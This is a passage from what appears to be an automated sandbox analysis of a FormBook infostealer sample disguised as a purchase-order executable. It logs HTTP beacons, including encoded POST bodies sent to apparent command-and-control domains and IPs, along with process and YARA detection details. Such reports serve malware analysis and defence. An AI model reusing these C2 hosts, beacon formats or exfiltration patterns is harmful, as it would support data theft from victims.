73 49 6b 6c 4c 41 70 57 6c 4d 73 68 73 58 34 49 6b 5a 67 4b 4d 42 59 2f 6e 41 4f 36 5a 32 61 4a 78 77 69 39 55 6e 6f 42 69 34 45 41 4b 61 50 58 42 72 48 49 79 4e 78 62 70 43 45 76 78 33 6a 30 62 33 49 70 6b 5a 36 55 47 47 68 43 58 68 4a 47 50 59 4c 34 7a 6a 55 4a 4a 59 38 4f 6f 6e 6d 53 42 30 3d Data Ascii: KI7UaA4=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0b3IpkZ6UGGhCXhJGPYL4zjUJJY8OonmSB0=
Jan 7, 2025 10:09:49.819799900 CET	918	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 09:09:49 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49762	199.192.21.169	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:52.329142094 CET	6445	OUT	POST /bowc/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.lonfor.website Origin: http://www.lonfor.website Cache-Control: max-age=0 Content-Length: 7372 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.lonfor.website/bowc/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 35 54 47 79 50 6c 56 43 39 59 31 51 31 41 5a 2b 59 31 2f 4a 57 69 49 31 73 42 43 4d 74 53 36 37 32 59 33 43 67 47 6c 71 2f 6c 6b 73 56 79 52 38 58 46 5a 4e 4d 78 77 2b 73 4c 4d 4e 6e 35 42 66 34 61 74 38 51 75 4e 6a 59 4a 76 73 49 6e 69 4c 41 62 48 31 4d 55 68 73 76 43 49 6b 74 77 4b 59 31 59 2f 48 51 4f 35 71 65 61 54 78 77 6b 36 55 6e 77 42 69 6c 61 41 4b 58 38 58 42 33 39 49 78 74 78 62 75 7a 77 78 68 37 30 68 61 33 77 6f 6d 52 39 58 47 61 42 4c 56 56 43 47 4d 6c 71 79 47 6e 73 41 49 34 64 62 61 4f 69 49 55 55 76 53 2f 77 77 31 61 42 64 4b 4c 75 51 62 50 55 66 4d 68 68 6e 2f 70 59 56 43 56 79 69 54 46 31 55 78 6d 58 4b 39 33 69 5a 6e 6d 2b 43 44 4c 62 54 4c 77 47 46 45 61 56 6e 67 56 6f 34 4c 6d 79 4f 68 72 47 54 75 4a 66 74 34 4e 4c 58 51 44 68 50 76 45 53 39 31 38 76 49 70 52 53 53 70 35 65 6b 75 79 70 75 74 76 46 65 5a 68 66 78 67 30 34 76 47 72 [TRUNCATED] Data Ascii: KI7UaA4=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10pp5TGyPlVC9Y1Q1AZ+Y1/JWiI1sBCMtS672Y3CgGlq/lksVyR8XFZNMxw+sLMNn5Bf4at8QuNjYJvsIniLAbH1MUhsvCIktwKY1Y/HQO5qeaTxwk6UnwBilaAKX8XB39Ixtxbuzwxh70ha3womR9XGaBLVVCGMlqyGnsAI4dbaOiIUUvS/ww1aBdKLuQbPUfMhhn/pYVCVyiTF1UxmXK93iZnm+CDLbTLwGFEaVngVo4LmyOhrGTuJft4NLXQDhPvES918vIpRSSp5ekuyputvFeZhfxg04vGrSb4kfaz2+aBX2gbe2vRWSIpFXzVkv+qOgNn2QqUvbPgPkkSMUb+qwK2RaWmCRVLcETyFrbVzEIQ8OvcnmCKE4YFtjuVF4km/yQtRK9jCTFsa5+s18G1JOuHZmRV8xEQE2Y09+IdhgI48QYaogl6WI0cS27sF7PbdOOD9aS6RR5xZVcezDAR553pR0kxW1+UpbuzXVepv5EbZzIwvymt9TjIwhq58jIAnyBFxAL1SfUwrqJZMb7WYAE74a6HWAzDAiZ/8uWZbqj6ZoI9UkFX+HhquOw8aIQyl/4+bTt0aqIBs2CVQ82Gez7jD5n2gJNDuhUC4C1GBN3yOE348rDBLYRzLFkf+Flz0FoYBL/zK4LDHA+zRVm4nVfqZXFGhtjZ2ZoGFwGPylh+ej6wzc9BCCwl92cgh+UgxwkHGa+UMihOWV0Xmzw/USGt1DvP9T9ilNB7q5Msvvmo5oOTEtyii/xvOcT3cU0bN0w2THq1KbsIhM62TCYMyRvB8z22Pjedtz5FGzDajtJAgJjchMnXxUueHI+TDLazhFNdaFAxRrOvB1Ou1rXYAdiAeUKdATYzeK6OtVOLv4tTbDFMkgdhMhTh+J5gHJW1vci2TdEwEVKFV3+jXL0L9V8h+1xVxYTrZ3grCWaqVduKUEjdkdMZVDEkRORgcIsVGOj [TRUNCATED]
Jan 7, 2025 10:09:52.329163074 CET	1289	OUT	Data Raw: 41 56 53 4c 38 52 39 70 54 4c 56 2f 42 77 33 31 54 57 53 44 4a 75 52 45 5a 76 44 44 4d 58 66 36 39 77 7a 44 66 64 67 37 4e 49 59 71 31 72 45 6d 62 64 4c 71 4a 51 73 63 6d 51 67 2b 49 45 4a 4a 62 48 46 47 62 52 4b 4c 43 6e 52 57 39 76 6d 65 45 74 Data Ascii: AVSL8R9pTLV/Bw31TWSDJuREZvDDMXf69wzDfdg7NIYq1rEmbdLqJQscmQg+IEJJbHFGbRKLCnRW9vmeEtpVUfQ8m28X2Zi3KtPjPVCno4SFoQ9/UfazWBhuG2kBQKAPNavIrHWXfAsxH9Gc8FMuPKM4FGYQUbwtLSIuShRWqwEUzXHYz9/iorBYzlS3PSZHU+N0FGYKSDGRRTyOh9xEAABsxSP0mRio37V0gAdEzz4AmujU93W
Jan 7, 2025 10:09:52.329247952 CET	177	OUT	Data Raw: 4b 45 70 70 44 45 59 64 55 6c 4b 71 6b 56 61 7a 57 7a 50 6a 77 4d 64 4a 4e 70 35 51 70 5a 6b 77 51 48 44 2b 4c 61 6b 6f 46 6e 76 6c 6e 51 79 54 47 49 68 34 76 4f 6f 41 36 4d 6d 58 66 47 62 50 57 35 54 4f 4f 54 49 77 34 62 44 50 72 34 49 68 46 74 Data Ascii: KEppDEYdUlKqkVazWzPjwMdJNp5QpZkwQHD+LakoFnvlnQyTGIh4vOoA6MmXfGbPW5TOOTIw4bDPr4IhFtHiLdF/6/YjHkBJEeTa/wbqEyAwUE2uhgyPMN06IExCtIY/Kfqj5Icm9irnvhSW7OYJpTxL1A0tuwd+zpfOdcvqOjMT8/w==
Jan 7, 2025 10:09:52.724545956 CET	918	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 09:09:52 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49763	199.192.21.169	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:09:55.030599117 CET	472	OUT	GET /bowc/?KHKq=K3iyk&KI7UaA4=hSFyBF7QNpd6wUow9uow+ol61tLJyNEWjK6IJxkbiJgyDGKURjVOywh5a/1i9fugKQVYW71g1Iqe5QUBl7nO7+58J8zlUP0v8LIzRfWvKIRe9+cNHz16wuE= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.lonfor.website Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Jan 7, 2025 10:09:55.223793983 CET	933	IN	HTTP/1.1 404 Not Found Date: Tue, 07 Jan 2025 09:09:55 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	49764	154.197.162.239	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:10:01.021178961 CET	748	OUT	POST /cf9p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.investshares.net Origin: http://www.investshares.net Cache-Control: max-age=0 Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.investshares.net/cf9p/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6c 48 6e 6c 4e 62 61 71 65 77 6a 78 50 63 30 4f 79 57 33 70 43 6f 68 32 4e 59 6a 70 61 65 4f 69 38 61 79 55 6f 4e 36 69 43 71 32 7a 75 6e 70 76 74 38 4c 41 44 65 74 74 48 37 73 77 65 62 78 51 62 75 55 59 46 65 2f 62 42 4a 2f 58 67 4d 44 66 64 4c 73 67 42 66 4c 32 39 43 52 30 30 77 78 79 41 39 42 7a 43 4f 42 67 57 52 71 70 54 7a 65 48 75 68 31 51 38 39 72 6b 65 59 7a 45 4a 4c 43 6c 65 42 71 69 35 38 36 68 35 6f 34 75 47 37 31 4c 52 61 4b 49 4a 43 56 50 56 55 78 6b 35 76 35 46 30 52 75 42 66 6e 73 57 42 59 71 4d 78 74 72 33 43 71 6e 65 4e 67 3d 3d Data Ascii: KI7UaA4=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIJCVPVUxk5v5F0RuBfnsWBYqMxtr3CqneNg==
Jan 7, 2025 10:10:01.188165903 CET	309	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Mon, 06 Jan 2025 17:09:24 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.11.20	49765	154.197.162.239	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:10:04.833554029 CET	768	OUT	POST /cf9p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.investshares.net Origin: http://www.investshares.net Cache-Control: max-age=0 Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.investshares.net/cf9p/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 71 69 2f 2f 65 55 70 50 65 69 42 71 32 7a 6d 48 70 71 67 63 4c 62 44 65 67 4f 48 2b 55 77 65 62 6c 51 62 76 45 59 5a 39 58 61 48 5a 2f 56 6d 4d 44 64 58 72 73 67 42 66 4c 32 39 43 55 38 30 77 35 79 41 4a 46 7a 45 71 56 6a 51 68 71 71 43 7a 65 48 6a 42 30 34 38 39 72 47 65 61 47 72 4a 49 36 6c 65 41 61 69 35 4a 4f 67 75 34 34 73 5a 72 30 6d 43 5a 72 45 4f 67 31 53 52 47 41 38 67 2f 49 2b 38 6e 6a 62 43 56 59 79 43 4c 32 2b 31 64 53 66 41 6f 6d 46 51 72 61 47 54 71 6b 67 49 33 35 65 79 64 6b 37 75 68 64 50 30 42 34 3d Data Ascii: KI7UaA4=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCL2+1dSfAomFQraGTqkgI35eydk7uhdP0B4=
Jan 7, 2025 10:10:05.000633955 CET	309	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Mon, 06 Jan 2025 17:09:28 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.11.20	49766	154.197.162.239	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:10:07.520858049 CET	3867	OUT	POST /cf9p/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.investshares.net Origin: http://www.investshares.net Cache-Control: max-age=0 Content-Length: 7372 Connection: close Content-Type: application/x-www-form-urlencoded Referer: http://www.investshares.net/cf9p/ User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1 Data Raw: 4b 49 37 55 61 41 34 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 38 6f 2b 2b 41 65 6c 52 6c 49 31 41 36 2b 79 38 63 61 4a 47 35 4f 52 52 4b 57 66 44 73 77 5a 4b 6a 34 4d 39 4c 59 53 78 6c 68 33 6a 6d 72 42 55 74 4d 70 55 68 66 66 6e 2b 70 6d 51 59 51 6b 31 55 42 73 72 56 7a 2b 54 63 63 38 68 79 45 2f 4e 41 53 41 58 6d 6c 71 50 58 57 68 55 45 6a 74 75 42 33 62 44 72 71 66 2b 35 47 55 77 54 4a 6e 68 4f 2f 49 30 2f 71 32 74 59 55 65 56 53 6c 35 70 73 58 32 4c 71 72 54 70 33 63 37 36 55 6a 38 36 6b 4c 6c 57 31 6c 66 72 71 62 73 45 72 61 78 6e 4e [TRUNCATED] Data Ascii: KI7UaA4=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg8o++AelRlI1A6+y8caJG5ORRKWfDswZKj4M9LYSxlh3jmrBUtMpUhffn+pmQYQk1UBsrVz+Tcc8hyE/NASAXmlqPXWhUEjtuB3bDrqf+5GUwTJnhO/I0/q2tYUeVSl5psX2LqrTp3c76Uj86kLlW1lfrqbsEraxnNVx9/o5VfBFyCxmXwtBFP3AYhnTx9ta6lFLzOQMaCQtheYS3h6x5dx2OLnPp3f6+7+pugL/1FdCRPBQCNspduCF1paDkY+84/zQwzerRgJjnchZdyDHPdcmV9d9ks8YevEQDfKWNpmVGVY0QA4ZiY7NVNRUk4VASNKYe/EVvMS7GKbwEL/j2sbcX0mwPFS2mIYbim7hXu23HfSmJGA59TpHYTRo02X3/zpYXnOYcOIVeB/RQ8HdfLHOC2px9cQ6TJFIAKbqaqrikSdSbm1dZzuRep0RmsGrGOn4EEj+LTpDAH85XRWtan4ZK/vF9ijroH1vumitF72fzKrFwCpAZ3l7JDrrkdzFkArWrRQTBGWNs2FG0WnVBVbiCQ/qfbiSsKb2dwZaj3yQQzIr4icPQvFcNH5Ak4UQhbhu/ZxEdGaOFSeceg5ViI4ye5I1rMJuP1kY90OwHy4ZkAPow4tcQ1DhOOJXUPdTl2WVKYi1eKhMjFj1f88PLbooXMQjR4ZnRDRF5ZruVUbNQVgJ2N17ou7PMtKA91c4oFV+i98XV0d8p1L3Fh0UclmXpMSmYQGoj4DO6ru7GZJ8hhBY0DX3KpkN0nnAVW9c0UIc3lAdRbpq/Rn56won8q9vVgumvPEyzUypzqPCKJVBQ+mKLTEGpTW3uFFkdnMrsyXG [TRUNCATED]
Jan 7, 2025 10:10:07.520910978 CET	4050	OUT	Data Raw: 74 2f 32 44 4b 48 55 56 71 58 54 56 33 2f 73 4d 69 4a 79 68 48 55 62 4e 4a 46 44 74 79 7a 78 49 66 6f 6a 75 46 4d 2f 42 48 2f 68 7a 69 53 53 63 69 56 57 36 49 64 57 31 75 42 57 55 38 76 30 45 4a 70 4b 6c 73 66 68 74 59 49 53 59 37 44 66 6f 54 4c Data Ascii: t/2DKHUVqXTV3/sMiJyhHUbNJFDtyzxIfojuFM/BH/hziSSciVW6IdW1uBWU8v0EJpKlsfhtYISY7DfoTLk/kzhGz5QYq8wSfO84WUQYmAPo1ogyoqQco+lD5DaL9ygrOn1z9R/F68sNS13nVqdgqE4zLS5FIcpYxCqHLQMaW0AmltlMl6NLFC7TgIENqNOaFJBTQlvbJmVKPfCLWmyAlEMnu8M1FL/yk5lfmyFrFRVzsQvED0x
Jan 7, 2025 10:10:07.689218044 CET	309	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Mon, 06 Jan 2025 17:09:31 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.11.20	49767	154.197.162.239	80

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:10:10.206197023 CET	474	OUT	GET /cf9p/?KI7UaA4=tknvN2jlhTuvpXXYKbmDHxfvNfIutDmLNYYXG7/rIeGG9fe7kNXrAZ+6u3EcgYD6CfYKVegcRI1iRuMeH9uFP/TayYjwTZYlDf+E8idq81YEdMFJEoEtWTU=&KHKq=K3iyk HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.investshares.net Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Jan 7, 2025 10:10:10.373959064 CET	141	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 06 Jan 2025 17:09:34 GMT Content-Type: text/html Content-Length: 0 Connection: close

Target ID:	0
Start time:	04:07:54
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe"
Imagebase:	0xc20000
File size:	298'496 bytes
MD5 hash:	B01928CD0BEFA10C1C43B3339E03BD8D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.22426186496.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:08:28
Start date:	07/01/2025
